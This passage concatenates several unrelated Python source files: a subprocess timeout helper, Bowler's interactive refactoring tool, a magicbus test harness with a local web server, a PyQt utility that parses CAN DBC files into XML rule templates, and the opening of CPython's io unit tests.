handler) for s in signals} try: yield finally: for sig, h in previous.iteritems(): signal.signal(sig, h) def call(*args, **kwargs): """Adds support for timeout.""" timeout = kwargs.pop('timeout', None) return Popen(*args, **kwargs).wait(timeout) def check_call(*args, **kwargs): """Adds support for timeout.""" retcode = call(*args, **kwargs) if retcode: raise CalledProcessError(retcode, kwargs.get('args') or args[0]) return 0 def check_output(*args, **kwargs): """Adds support for timeout.""" timeout = kwargs.pop('timeout', None) if 'stdout' in kwargs: raise ValueError('stdout argument not allowed, it will be overridden.') process = Popen(stdout=PIPE, *args, **kwargs) output, _ = process.communicate(timeout=timeout) retcode = process.poll() if retcode: raise CalledProcessError(retcode, kwargs.get('args') or args[0], output) return output def call_with_timeout(args, timeout, **kwargs): """Runs an executable; kill it in case of timeout.""" proc = Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, **kwargs) try: out, err = proc.communicate(timeout=timeout) except TimeoutExpired as e: out = e.output err = e.stderr proc.kill() proc.wait() return out, err, proc.returncode, proc.duration() def inhibit_os_error_reporting(): """Inhibits error reporting UI and core files. This function should be called as early as possible in the process lifetime. """ global _OS_ERROR_REPORTING_INHIBITED if not _OS_ERROR_REPORTING_INHIBITED: _OS_ERROR_REPORTING_INHIBITED = True if sys.platform == 'win32': # Windows has a bad habit of opening a dialog when a console program # crashes, rather than just letting it crash. Therefore, when a program # crashes on Windows, we don't find out until the build step times out. # This code prevents the dialog from appearing, so that we find out # immediately and don't waste time waiting for a user to close the dialog. # https://msdn.microsoft.com/en-us/library/windows/desktop/ms680621.aspx SEM_FAILCRITICALERRORS = 1 SEM_NOGPFAULTERRORBOX = 2 SEM_NOALIGNMENTFAULTEXCEPT = 0x8000 ctypes.windll.kernel32.SetErrorMode( SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX| SEM_NOALIGNMENTFAULTEXCEPT) # TODO(maruel): Other OSes. # - OSX, need to figure out a way to make the following process tree local: # defaults write com.apple.CrashReporter UseUNC 1 # defaults write com.apple.CrashReporter DialogType none # - Ubuntu, disable apport if needed. def split(data, sep='\n'): """Splits pipe data by |sep|. Does some buffering. For example, [('stdout', 'a\nb'), ('stdout', '\n'), ('stderr', 'c\n')] -> [('stdout', 'a'), ('stdout', 'b'), ('stderr', 'c')]. Args: data: iterable of tuples (pipe_name, bytes). Returns: An iterator of tuples (pipe_name, bytes) where bytes is the input data but split by sep into separate tuples. """ # A dict {pipe_name -> list of pending chunks without separators} pending_chunks = collections.defaultdict(list) for pipe_name, chunk in data: if chunk is None: # Happens if a pipe is closed. continue pending = pending_chunks[pipe_name] start = 0 # offset in chunk to start |sep| search from while start < len(chunk): j = chunk.find(sep, start) if j == -1: pending_chunks[pipe_name].append(chunk[start:]) break to_emit = chunk[start:j] start = j + 1 if pending: # prepend and forget to_emit = ''.join(pending) + to_emit pending = [] pending_chunks[pipe_name] = pending yield pipe_name, to_emit # Emit remaining chunks that don't end with separators as is. for pipe_name, chunks in sorted(pending_chunks.iteritems()): if chunks: yield pipe_name, ''.join(chunks)
tool.py
#!/usr/bin/env python3 # # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import difflib import logging import multiprocessing import os import sys import time from queue import Empty from typing import Any, Iterator, List, Optional, Sequence, Tuple import click from fissix import pygram from fissix.pgen2.parse import ParseError from fissix.refactor import RefactoringTool, _detect_future_features from moreorless.patch import PatchException, apply_single_file from .helpers import filename_endswith from .types import ( BadTransform, BowlerException, BowlerQuit, Filename, FilenameMatcher, Fixers, Hunk, Processor, RetryFile, ) PROMPT_HELP = { "y": "apply this hunk", "n": "skip this hunk", "a": "apply this hunk and all remaining hunks for this file", "d": "skip this hunk and all remaining hunks for this file", "q": "quit; do not apply this hunk or any remaining hunks", "?": "show help", } log = logging.getLogger(__name__) def diff_texts(a: str, b: str, filename: str) -> Iterator[str]: lines_a = a.splitlines() lines_b = b.splitlines() return difflib.unified_diff(lines_a, lines_b, filename, filename, lineterm="") def prompt_user(question: str, options: str, default: str = "") -> str: options = options.lower() default = default.lower() assert len(default) < 2 and default in options if "?" not in options: options += "?" prompt_options = ",".join(o.upper() if o == default else o for o in options) prompt = f"{question} [{prompt_options}]? " result = "" while True: result = input(prompt).strip().lower() if result == "?": for option in PROMPT_HELP: click.secho(f"{option} - {PROMPT_HELP[option]}", fg="red", bold=True) elif len(result) == 1 and result in options: return result elif result: click.echo(f'invalid response "{result}"') elif default: return default class BowlerTool(RefactoringTool): NUM_PROCESSES = os.cpu_count() or 1 IN_PROCESS = False # set when run DEBUG mode from command line def __init__( self, fixers: Fixers, *args, interactive: bool = True, write: bool = False, silent: bool = False, in_process: Optional[bool] = None, hunk_processor: Processor = None, filename_matcher: Optional[FilenameMatcher] = None, **kwargs, ) -> None: options = kwargs.pop("options", {}) super().__init__(fixers, *args, options=options, **kwargs) self.queue_count = 0 self.queue = multiprocessing.JoinableQueue() # type: ignore self.results = multiprocessing.Queue() # type: ignore self.semaphore = multiprocessing.Semaphore(self.NUM_PROCESSES) self.interactive = interactive self.write = write self.silent = silent if in_process is None: in_process = self.IN_PROCESS # pick the most restrictive of flags; we can pickle fixers when # using spawn. if sys.platform == "win32" or sys.version_info > (3, 7): in_process = True self.in_process = in_process self.exceptions: List[BowlerException] = [] if hunk_processor is not None: self.hunk_processor = hunk_processor else: self.hunk_processor = lambda f, h: True self.filename_matcher = filename_matcher or filename_endswith(".py") def log_error(self, msg: str, *args: Any, **kwds: Any) -> None: self.logger.error(msg, *args, **kwds) def get_fixers(self) -> Tuple[Fixers, Fixers]: fixers = [f(self.options, self.fixer_log) for f in self.fixers] pre: Fixers = [f for f in fixers if f.order == "pre"] post: Fixers = [f for f in fixers if f.order == "post"] return pre, post def processed_file( self, new_text: str, filename: str, old_text: str = "", *args, **kwargs ) -> List[Hunk]: self.files.append(filename) hunks: List[Hunk] = [] if old_text != new_text: a, b, *lines = list(diff_texts(old_text, new_text, filename)) hunk: Hunk = [] for line in lines: if line.startswith("@@"): if hunk: hunks.append([a, b, *hunk]) hunk = [] hunk.append(line) if hunk: hunks.append([a, b, *hunk]) original_grammar = self.driver.grammar if "print_function" in _detect_future_features(new_text): self.driver.grammar = pygram.python_grammar_no_print_statement try: new_tree = self.driver.parse_string(new_text) if new_tree is None: raise AssertionError("Re-parsed CST is None") except Exception as e: raise BadTransform( f"Transforms generated invalid CST for {filename}", filename=filename, hunks=hunks, ) from e finally: self.driver.grammar = original_grammar return hunks def refactor_file(self, filename: str, *a, **k) -> List[Hunk]: try: hunks: List[Hunk] = [] input, encoding = self._read_python_source(filename) if input is None: # Reading the file failed. return hunks except (OSError, UnicodeDecodeError) as e: log.error(f"Skipping {filename}: failed to read because {e}") return hunks try: if not input.endswith("\n"): input += "\n" tree = self.refactor_string(input, filename) if tree: hunks = self.processed_file(str(tree), filename, input) except ParseError as e: log.exception("Skipping {filename}: failed to parse ({e})") return hunks def refactor_dir(self, dir_name: str, *a, **k) -> None: """Descends down a directory and refactor every Python file found. Python files are those for which `self.filename_matcher(filename)` returns true, to allow for custom extensions. Files and subdirectories starting with '.' are skipped. """ for dirpath, dirnames, filenames in os.walk(dir_name): self.log_debug("Descending into %s", dirpath) dirnames.sort() filenames.sort() for name in filenames: fullname = os.path.join(dirpath, name) if not name.startswith(".") and self.filename_matcher( Filename(fullname) ): self.queue_work(Filename(fullname)) # Modify dirnames in-place to remove subdirs with leading dots dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")] def refactor_queue(self) -> None: self.semaphore.acquire() while True: filename = self.queue.get() if filename is None: break try: hunks = self.refactor_file(filename) self.results.put((filename, hunks, None)) except RetryFile: self.log_debug(f"Retrying {filename} later...") self.queue.put(filename) except BowlerException as e: log.exception(f"Bowler exception during transform of {filename}: {e}") self.results.put((filename, e.hunks, e)) except Exception as e: log.exception(f"Skipping {filename}: failed to transform because {e}") self.results.put((filename, [], e)) finally: self.queue.task_done() self.semaphore.release() def queue_work(self, filename: Filename) -> None: self.queue.put(filename) self.queue_count += 1 def refactor(self, items: Sequence[str], *a, **k) -> None: """Refactor a list of files and directories.""" for dir_or_file in sorted(items): if os.path.isdir(dir_or_file): self.refactor_dir(dir_or_file) else: self.queue_work(Filename(dir_or_file)) children: List[multiprocessing.Process] = [] if self.in_process: self.queue.put(None) self.refactor_queue() else: child_count = max(1, min(self.NUM_PROCESSES, self.queue_count)) self.log_debug(f"starting {child_count} processes") for i in range(child_count): child = multiprocessing.Process(target=self.refactor_queue) child.start() children.append(child) self.queue.put(None) results_count = 0 while True: try: filename, hunks, exc = self.results.get_nowait() results_count += 1 if exc: self.log_error(f"{type(exc).__name__}: {exc}") if exc.__cause__: self.log_error( f" {type(exc.__cause__).__name__}: {exc.__cause__}" ) if isinstance(exc, BowlerException) and exc.hunks: diff = "\n".join("\n".join(hunk) for hunk in exc.hunks) self.log_error(f"Generated transform:\n{diff}") self.exceptions.append(exc) else: self.log_debug(f"results: got {len(hunks)} hunks for {filename}") self.process_hunks(filename, hunks) except Empty: if self.queue.empty() and results_count == self.queue_count: break elif not self.in_process and not any( child.is_alive() for child in children ): self.log_debug(f"child processes stopped without consuming work") break else: time.sleep(0.05) except BowlerQuit: for child in children: child.terminate() break self.log_debug(f"all children stopped and all diff hunks processed") def process_hunks(self, filename: Filename, hunks: List[Hunk]) -> None: auto_yes = False result = "" accepted_hunks = "" for hunk in hunks: if self.hunk_processor(filename, hunk) is False: continue if not self.silent: for line in hunk: if line.startswith("---"): click.secho(line, fg="red", bold=True) elif line.startswith("+++"): click.secho(line, fg="green", bold=True) elif line.startswith("-"): click.secho(line, fg="red") elif line.startswith("+"): click.secho(line, fg="green") else: click.echo(line) if self.interactive: if auto_yes: click.echo(f"Applying remaining hunks to {filename}") result = "y" else: result = prompt_user("Apply this hunk", "ynqad", "n") self.log_debug(f"result = {result}") if result == "q": self.apply_hunks(accepted_hunks, filename) raise BowlerQuit() elif result == "d": self.apply_hunks(accepted_hunks, filename) return # skip all remaining hunks elif result == "n": continue elif result == "a": auto_yes = True result = "y" elif result != "y": raise ValueError("unknown response") if result == "y" or self.write: accepted_hunks += "\n".join(hunk[2:]) + "\n" self.apply_hunks(accepted_hunks, filename) def apply_hunks(self, accepted_hunks, filename): if accepted_hunks: with open(filename) as f: data = f.read() try: accepted_hunks = f"--- {filename}\n+++ {filename}\n{accepted_hunks}" new_data = apply_single_file(data, accepted_hunks) except PatchException as err: log.exception(f"failed to apply patch hunk: {err}") return with open(filename, "w") as f: f.write(new_data) def run(self, paths: Sequence[str]) -> int: if not self.errors: self.refactor(paths) self.summarize() return int(bool(self.errors or self.exceptions))
__init__.py
"""Regression test suite for magicbus. Run 'nosetests -s test/' to exercise all tests. """ from magicbus.compat import HTTPServer, HTTPConnection, HTTPHandler import os from subprocess import Popen import threading import time from magicbus.plugins import SimplePlugin def assertEqual(x, y, msg=None): if not x == y: raise AssertionError(msg or '%r != %r' % (x, y)) def assertNotEqual(x, y, msg=None): if x == y: raise AssertionError(msg or '%r == %r' % (x, y)) class Process(object): def __init__(self, args): self.args = args self.process = None def start(self): # Exceptions in the child will be re-raised in the parent, # so if you're expecting one, trap this call and check for it. cwd = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')) env = os.environ.copy() env['PYTHONPATH'] = cwd self.process = Popen(self.args, env=env) def stop(self): if self.process is not None: self.process.kill() def join(self): return self.process.wait() class WebServer(HTTPServer): def stop(self): """Stops the serve_forever loop without waiting.""" # Sigh. Really, standard library, really? Double underscores? self._BaseServer__shutdown_request = True def handle_error(self, request, client_address): # Simulate unsafe servers that don't trap errors well raise class WebService(object): def __init__(self, address=('127.0.0.1', 8000), handler_class=None): self.address = address self.handler_class = handler_class self.httpd = None self.ready = False def start(self): self.httpd = WebServer(self.address, self.handler_class) self.ready = True self.httpd.serve_forever() def stop(self): if self.httpd is not None: self.httpd.stop() self.httpd = None self.ready = False def do_GET(self, uri): conn = HTTPConnection(*self.address) try: conn.request('GET', uri) return conn.getresponse() finally: conn.close() class WebAdapter(SimplePlugin): def __init__(self, bus, service): self.bus = bus self.service = service def START(self): threading.Thread(target=self.service.start).start() self.wait() # Make sure we start httpd after the daemonizer and pidfile. START.priority = 75 def STOP(self): self.service.stop() STOP.priority = 25 def wait(self): """Wait until the HTTP server is ready to receive requests.""" while not getattr(self.service, 'ready', False): time.sleep(.1) class WebHandler(HTTPHandler): def log_request(self, code='-', size='-'): HTTPHandler.log_request(self, code, size) def respond(self, body=None, status=200, headers=None): if headers is None: headers = [] if body is not None: if isinstance(body, str): body = body.encode('utf-8') if 'Content-Length' not in (k for k, v in headers): headers.append(('Content-Length', str(len(body)))) self.send_response(status) for k, v in headers: self.send_header(k, v) self.end_headers() if body is not None: self.wfile.write(body) def handle(self, *args, **kwargs): self.bus.publish('acquire_thread') HTTPHandler.handle(self)
Data.py
import sys from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import * from PyQt5.QtCore import * import tkinter as tk from tkinter import filedialog import xml.dom.minidom import os import re import threading import copy import json import time import pandas as pd import xml.etree.ElementTree as ET class test(QWidget): def __init__(self): super(test, self).__init__() def setupUi(self, path): self.setFixedSize(400, 63) self.main_widget = QtWidgets.QWidget(self) self.label = QtWidgets.QLabel(self.main_widget) self.setWindowTitle('解析中...') self.label.setText(" ") self.label.move(10, 44) self.progressBar = QtWidgets.QProgressBar(self.main_widget) self.progressBar.setGeometry(QtCore.QRect(10, 10, 380, 30)) self.flag = 0 self.thread_2 = threading.Thread(target=self.toclose) self.thread_2.start() # 创建并启用子线程 try: self.thread_1 = Data(path) self.thread_1.progressBarValue.connect(self.copy_file) self.thread_1.start() time.sleep(0.1) self.thread_1.join() except Exception as e: self.label.setText("解析失败") self.flag = 1 self.thread_3 = threading.Thread(target=self.x) self.thread_3.start() def x(self): while not self.thread_1.isFinished() or not self.thread_2.is_alive(): time.sleep(1) continue else: if self.label.text() == '解析成功': return else: self.label.setText("解析失败") time.sleep(1) self.close() def copy_file(self, i): self.progressBar.setValue(i) if i == 100: time.sleep(0.25) self.label.setText("解析成功") self.flag = 1 def toclose(self): while self.flag != 1: time.sleep(0.5) continue else: time.sleep(1) self.close() class Data(QThread): progressBarValue = pyqtSignal(int) # 更新进度条 def __init__(self, path): self.path = path self.key = path.split("/")[-1].split(".")[0] self.xmlpath = '' super(Data, self).__init__() self.exc = None def join(self): if self.exc: msg = "Error: %s"(self.exc[1]) new_exc = Exception(msg) raise new_exc.with_traceback(self.exc[2]) # 处理数据 def run(self): che = {} canId = [] sender = [] receiverID = [] cycleTimeId = [] signalList = [] name = [] cycleTime = [] startBit = [] length = [] note = [] receiver = [] path = self.path with open(path, 'rb') as f: # cur_encoding = chardet.detect(f.read(10000))['encoding'] # print(cur_encoding) values = f.read().decode('gbk', errors='replace') # 所有数据 # 处理canID,name,sender,startBit,length,receiver result = re.findall(r'(BO_\s\w*\s\w*:\s\w\s\w*)((?:.|\n)*?)(?=BO_)', values, re.M) for i in result: a = i[1].replace('" ', '" ') canId.append(re.findall(r'(?<=BO_\s)\w*(?=\s)', str(i), re.I)) name.append(re.findall(r'(?<=SG_\s)\w+(?=\s:)', str(i), re.M)) sender.append(re.findall(r'(?<=:\s\w\s)\w*', str(i), re.M)) startBit.append(re.findall(r'(?<=\s:\s)\d*(?=\\|)', str(i), re.M)) length.append(re.findall(r"(?<=\d\|)\d*(?=@)", str(i), re.M)) receiver.append(re.findall(r'(?<=" )[\w,]*', a, re.S)) # 处理ID的receiver,cycleTime # cycleTimeId.append( # re.findall(r'(?<=BA_ "GenMsgCycleTime" BO_ ' + canId[i][0] + '\s)\d+(?=;)', values, re.M)) try: for i in range(len(result)): c = re.findall(r'(?<=BA_ "GenMsgCycleTime" BO_ ' + canId[i][0] + '\s)\d+(?=;)', values, re.M) if c != []: cycleTimeId.append(c) else: cycleTimeId.append(['0']) b = [] if receiver[i] != []: for j in range(len(name[i])): a = receiver[i][j].split(',') for k in range(len(a)): b.append(a[k]) receiverID.append(list(set(b))) else: a = [] receiverID.append(a) cycleTimeId[0] = [0] except Exception as e: self.exc = sys.exc_info() time.sleep(3.5) return # 处理cycleTime,note for i in range(len(result)): a = [] b = [] for j in range(len(name[i])): a1 = (re.findall(r'(?<=BA_ "GenSigCycleTime" SG_ ' + canId[i][0] + '\s' + name[i][j] + '\s)\d*(?=;)', values, re.I)) b1 = (re.findall(r'(?<=CM_ SG_ ' + canId[i][0] + '\s' + name[i][j] + ')(\s+"(?:.|\n)*?")(?=;)', values, re.M)) if not a1: a1 = ['0'] if not b1: b1 = ['None'] a.append(a1[0]) b.append(b1[0].replace('\r\n', '').replace('"', '').replace(' ', '')) cycleTime.append(a) note.append(b) k = ((i + 1) / len(result)) * 100 * 0.95 if k >= 95: time.sleep(1) break self.progressBarValue.emit(k) # print(k) # print('loading...%.2f' % k, "%") # 检查 # for i in range(len(result)): # print(canId[i],len(name[i]),len(cycleTimeId[i]),len(startBit[i]),len(length[i]),len(note[i]),len(receiver[i])) # print(cycleTime[i],note[i]) # print(canId[i][0]) # print(cycleTimeId) # exit(0) # signalList字典 try: for i in range(len(result)): lis = [] for j in range(len(name[i])): dic2 = {} dic2_copy = copy.deepcopy(dic2) dic2_copy["name"] = name[i][j] dic2_copy["cycleTime"] = int(cycleTime[i][j]) dic2_copy["startBit"] = int(startBit[i][j]) dic2_copy["length"] = int(length[i][j]) dic2_copy["note"] = note[i][j] dic2_copy["receiver"] = receiver[i][j] lis.append(dic2_copy) dic2.clear() signalList.append(lis) # 外层字典 for i in range(len(result)): dic = {} dic_copy = copy.deepcopy(dic) dic_copy["canId"] = int(canId[i][0]) dic_copy["sender"] = sender[i][0] dic_copy["reciver"] = receiverID[i] dic_copy["signalList"] = signalList[i] dic_copy["cycleTime"] = int(cycleTimeId[i][0]) if int(canId[i][0]) < 10000: che[int(canId[i][0])] = dic_copy dic.clear() except Exception as e: self.exc = sys.exc_info() # print(e) # print(self.exc) time.sleep(3.5) return # 保存到json with open('.\\' + self.key + '.json', 'w', encoding='utf-8') as fp: json.dump(che, fp) k = 100 self.progressBarValue.emit(k) # 生成表格数据 def json_to_table(self, can, time, sample): table = pd.read_json('.\\' + self.key + '.json', encoding='utf-8') timeout = time * table.loc["cycleTime"][can] sampleCycle = sample * table.loc["cycleTime"][can] rolingcounterStartBit = 0 rolingcounterLenth = 0 crcStartBit = 0 crcLenth = 0 priority = 3 for i in range(len(table.loc["signalList"][can])): if r'Rolling' in table.loc["signalList"][can][i]["name"]: index = i rolingcounterStartBit = table.loc["signalList"][can][index]["startBit"] rolingcounterLenth = table.loc["signalList"][can][index]["length"] for j in range(len(table.loc["signalList"][can])): if r'Check' in table.loc["signalList"][can][j]["name"]: index = j crcStartBit = table.loc["signalList"][can][index]["startBit"] crcLenth = table.loc["signalList"][can][index]["length"] data_row = [can, timeout, sampleCycle, rolingcounterStartBit, rolingcounterLenth, crcStartBit, crcLenth, priority] return data_row # xml模板 def xml_example(self, df): whitelists = list(df["canId"]) timeouts = list(df["timeout"]) sampleCycles = list(df["sampleCycle"]) rollingcounterStartBits = list(df["rollingcounterStartBit"]) rollingcounterLenths = list(df["rollingcounterLenth"]) crcStartBits = list(df["crcStartBit"]) crcLenths = list(df["crcLenth"]) prioritys = list(df["priority"]) t = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time())) doc = xml.dom.minidom.Document() rootnode = doc.createElement('root') data = doc.createElement('data') respStatus = doc.createElement('respStatus') respStatus.appendChild(doc.createTextNode('OK')) errorCode = doc.createElement('errorCode') errorCode.appendChild(doc.createTextNode('')) errorMsg = doc.createElement('errorMsg') errorMsg.appendChild(doc.createTextNode('')) confTimestamp = doc.createElement('confTimestamp') confTimestamp.appendChild(doc.createTextNode(str(t))) moduleSwitch = doc.createElement('moduleSwitch') moduleSwitch.appendChild(doc.createTextNode('true')) doc.appendChild(rootnode) rootnode.appendChild(respStatus) rootnode.appendChild(errorCode) rootnode.appendChild(errorMsg) rootnode.appendChild(confTimestamp) rootnode.appendChild(moduleSwitch) rootnode.appendChild(data) for i in range(len(whitelists)): canIdWhiteList = doc.createElement('canIdWhiteList') canId = doc.createElement('canId') canId.appendChild(doc.createTextNode(str(whitelists[i]))) timeout = doc.createElement('timeout') timeout.appendChild(doc.createTextNode(str(timeouts[i]))) sampleCycle = doc.createElement('sampleCycle') sampleCycle.appendChild(doc.createTextNode(str(sampleCycles[i]))) rollingcounterStartBit = doc.createElement('rollingcounterStartBit') rollingcounterStartBit.appendChild(doc.createTextNode(str(rollingcounterStartBits[i]))) rollingcounterLenth = doc.createElement('rollingcounterLenth') rollingcounterLenth.appendChild(doc.createTextNode(str(rollingcounterLenths[i]))) crcStartBit = doc.createElement('crcStartBit') crcStartBit.appendChild(doc.createTextNode(str(crcStartBits[i]))) crcLenth = doc.createElement('crcLenth') crcLenth.appendChild(doc.createTextNode(str(crcLenths[i]))) priority = doc.createElement('priority') priority.appendChild(doc.createTextNode(str(prioritys[i]))) canIdWhiteList.appendChild(canId) canIdWhiteList.appendChild(timeout) canIdWhiteList.appendChild(sampleCycle) canIdWhiteList.appendChild(rollingcounterStartBit) canIdWhiteList.appendChild(rollingcounterLenth) canIdWhiteList.appendChild(crcStartBit) canIdWhiteList.appendChild(crcLenth) canIdWhiteList.appendChild(priority) data.appendChild(canIdWhiteList) try: root = tk.Tk() root.withdraw() path = filedialog.asksaveasfilename(defaultextension='.xml', initialdir='C:\\', initialfile=self.key + '.xml', parent=root, title='xml模板另存为') # if path: with open(path, 'w') as fp: if not os.path.exists(path): os.mkdirs(path) doc.writexml(fp, indent='\t', addindent='\t', newl='\n', encoding="utf-8") self.xmlpath = path except Exception as e: # print(e) return return self.xmlpath def search_by_id(self, id): table = pd.read_json('.\\' + self.key + '.json', encoding='utf-8') data = [] ban_name = ['crc', 'Rolling', 'Check'] for i in range(len(table.loc['signalList'][id])): if all(ba not in table.loc["signalList"][id][i]["name"] for ba in ban_name): name = table.loc["signalList"][id][i]["name"] note = table.loc["signalList"][id][i]["note"] row = [id, name, note] data.append(row) return data def search_by_word(self, word): table = pd.read_json('.\\' + self.key + '.json', encoding='utf-8') data = [] ban_name = ['crc', 'Rolling', 'Check'] for i in range(len(table.iloc[0])): for j in table.iloc[3].values[i]: if word in j['name']: if all(ba not in j['name'] for ba in ban_name): name = j['name'] note = j['note'] id = table.iloc[3].index[i] row = [id, name, note] data.append(row) return data # 上传规则 def uploadrulelist(self, ulp=1000, ulCN=60, sd=8, md=3, py=3, zg='true', **kwargs): uploadRuleList = ET.Element("uploadRuleList") # uploadRuleList = ET.SubElement(data, 'uploadRuleList') collectionCondition = ET.SubElement(uploadRuleList, 'collectionCondition') for i in kwargs['dataframe'].values: collectionContent = ET.SubElement(uploadRuleList, 'collectionContent') collectionContent.text = i[1] canId = ET.SubElement(uploadRuleList, 'canId') canId.text = str(i[0]) note = ET.SubElement(uploadRuleList, 'note') note.text = str(i[2]) uploadCondition = ET.SubElement(uploadRuleList, 'uploadCondition') uploadPeriod = ET.SubElement(uploadCondition, 'uploadPeriod') uploadContentNumber = ET.SubElement(uploadCondition, 'uploadContentNumber') trigger = ET.SubElement(uploadCondition, 'trigger') event = ET.SubElement(trigger, 'event') afterEventHappen = ET.SubElement(trigger, 'afterEventHappen') uploadParameter = ET.SubElement(uploadRuleList, 'uploadParameter') sid = ET.SubElement(uploadParameter, 'sid') mid = ET.SubElement(uploadParameter, 'mid') priority = ET.SubElement(uploadParameter, 'priority') zipFlag = ET.SubElement(uploadParameter, 'zipFlag') if kwargs['flag'] == 0: collectionCondition.text = 'auto_collection' elif kwargs['flag'] == 1: collectionCondition.text = 'RUN_TIME%' + str(kwargs['RUN_TIME']) + '==0' else: collectionCondition.text = 'none' uploadPeriod.text = str(ulp) uploadContentNumber.text = str(ulCN) sid.text = str(sd) mid.text = str(md) priority.text = str(py) zipFlag.text = zg return uploadRuleList def uploadrulelist_change(self, tree): uploadCondition = tree.find('uploadCondition') trigger = uploadCondition.find('trigger') uploadParameter = tree.find('uploadParameter') collectionCondition_text = tree[0].text collectionContent_text = [] canId = [] note = [] for element in tree.findall('collectionContent'): collectionContent_text.append(element.text) for i in tree.findall('canId'): canId.append(i.text) for j in tree.findall('note'): note.append(j.text) uploadPeriod_text = uploadCondition[0].text uploadContentNumber_text = uploadCondition[1].text event_text = trigger[0].text afterEventHappen_text = trigger[1].text sid_text = uploadParameter[0].text mid_text = uploadParameter[1].text priority_text = uploadParameter[2].text zipFlag_text = uploadParameter[3].text dic = {'collectionCondition':collectionCondition_text,'collectionContent':collectionContent_text,'uploadPeriod': uploadPeriod_text,'uploadContentNumber':uploadContentNumber_text,'event':event_text,'afterEventHappen': afterEventHappen_text,'sid':sid_text,'mid':mid_text,'priority':priority_text,'zipFlag':zipFlag_text, 'canId':canId,'note':note} # print(dic) return dic def sava_uploadrulelist(self, node, xmlpath): try: open(xmlpath) except Exception as e: print(e) return tree = ET.parse(xmlpath) root = tree.getroot() data = root.find('data') print(node.find('collectionCondition')) if node.find('collectionCondition') != None: for i in node.findall('canId'): node.remove(i) for j in node.findall('note'): node.remove(j) data.append(node) tree.write(xmlpath, encoding='utf-8') def deviceStorage(self, max, df3): deviceStorage = ET.Element("deviceStorage") maxStorageSize = ET.SubElement(deviceStorage, 'maxStorageSize') maxStorageSize.text = str(max) usedStorageScale_text = list(df3["usedStorageScale"]) collectLevelGE_text = list(df3["collectLevelGE"]) for i in range(len(usedStorageScale_text)): degradeCollectCondition = ET.SubElement(deviceStorage, 'degradeCollectCondition') usedStorageScale = ET.SubElement(degradeCollectCondition, 'usedStorageScale') usedStorageScale.text = str(usedStorageScale_text[i]) collectLevelGE = ET.SubElement(degradeCollectCondition, 'collectLevelGE') collectLevelGE.text = str(collectLevelGE_text[i]) return deviceStorage # 文件选择 def choose_data(): root = tk.Tk() root.withdraw() fpath = filedialog.askopenfilename() """设置按钮显示所有车型的dbc""" # for path in fpath: # if not path.endswith('dbc'): # print('文件有误') # exit(0) # else: return fpath # path = choose_data() if __name__ == '__main__': df = pd.DataFrame([[608, 120, 40, 0, 0, 0, 0, 3], [614, 120, 40, 0, 0, 0, 0, 3], [688, 150, 50, 0, 0, 19, 4, 3], [760, 300, 100, 0, 0, 0, 0, 3] ], columns=["canId", "timeout", "sampleCycle", "rollingcounterStartBit", "rollingcounterLenth", "crcStartBit", "crcLenth", "priority"]) df2 = pd.DataFrame([[760, 'HU_DVRErrorRecord', 'aaaaaaaaaaaa'], [760, 'HU_SDCapacity', 'aaaaaaaaaaaa'], [760, 'HU_DVRSystemImprint', 'aaaaaaaaaaaa'], [760, 'HU_RebroadcastReq', 'aaaaaaaaaaaa'], [760, 'HU_RealTimeReq', 'aaaaaaaaaaaa'], ], columns=["canId", "信号名", "注释"]) df3 = pd.DataFrame([[0.2, 2], [0.7, 3] ], columns=['usedStorageScale', 'collectLevelGE']) # path = 'G:/xml/2InfoCAN_S111.dbc' path = choose_data() d = Data(path) # d.search_by_id(598) # d.search_by_word('BCM') # app = QtWidgets.QApplication(sys.argv) # testIns = test() # testIns.setupUi(path) # testIns.show() # sys.exit(app.exec_()) # d.run() # a = d.json_to_table(946,3,1) # print(a) d.xml_example(df) # print(d.xmlpath) # d.xmlpath = r'C:/Users/201904622/Desktop/2InfoCAN_S111.xml' # rule1 = d.uploadrulelist(flag=0, dataframe=df2) # rule2 = d.uploadrulelist(flag=0, dataframe=df2, sd=10000000) # d.sava_uploadrulelist(rule1) # d.sava_uploadrulelist(rule2) # dic = d.uploadrulelist_change(rule1) # a = d.deviceStorage(63400, df3) # d.sava_uploadrulelist(a)
test_io.py
"""Unit tests for the io module.""" # Tests of io are scattered over the test suite: # * test_bufio - tests file buffering # * test_memoryio - tests BytesIO and StringIO # * test_fileio - tests FileIO # * test_file - tests the file interface # * test_io - tests everything else in the io module # * test_univnewlines - tests universal newline support # * test_largefile - tests operations on a file greater than 2**32 bytes # (only enabled with -ulargefile) ################################################################################ # ATTENTION TEST WRITERS!!! ################################################################################ # When writing tests for io, it's important to test both the C and Python # implementations. This is usually done by writing a base test that refers to # the type it is testing as an attribute. Then it provides custom subclasses to # test both implementations. This file has lots of examples. ################################################################################ import abc import array import errno import locale import os import pickle import random import signal import sys import sysconfig import textwrap import threading import time import unittest import warnings import weakref from collections import deque, UserList from itertools import cycle, count from test import support from test.support.script_helper import ( assert_python_ok, assert_python_failure, run_python_until_end) from test.support import import_helper from test.support import os_helper from test.support import threading_helper from test.support import warnings_helper from test.support.os_helper import FakePath import codecs import io # C implementation of io import _pyio as pyio # Python implementation of io try: import ctypes except ImportError: def byteslike(*pos, **kw): return array.array("b", bytes(*pos, **kw)) else: def byteslike(*pos, **kw): """Create a bytes-like object having no string or sequence methods""" data = bytes(*pos, **kw) obj = EmptyStruct() ctypes.resize(obj, len(data)) memoryview(obj).cast("B")[:] = data return obj class EmptyStruct(ctypes.Structure): pass _cflags = sysconfig.get_config_var('CFLAGS') or '' _config_args = sysconfig.get_config_var('CONFIG_ARGS') or '' MEMORY_SANITIZER = ( '-fsanitize=memory' in _cflags or '--with-memory-sanitizer' in _config_args ) # Does io.IOBase finalizer log the exception if the close() method fails? # The exception is ignored silently by default in release build. IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode) def _default_chunk_size(): """Get the default TextIOWrapper chunk size""" with open(__file__, "r", encoding="latin-1") as f: return f._CHUNK_SIZE class MockRawIOWithoutRead: """A RawIO implementation without read(), so as to exercise the default RawIO.read() which calls readinto().""" def __init__(self, read_stack=()): self._read_stack = list(read_stack) self._write_stack = [] self._reads = 0 self._extraneous_reads = 0 def write(self, b): 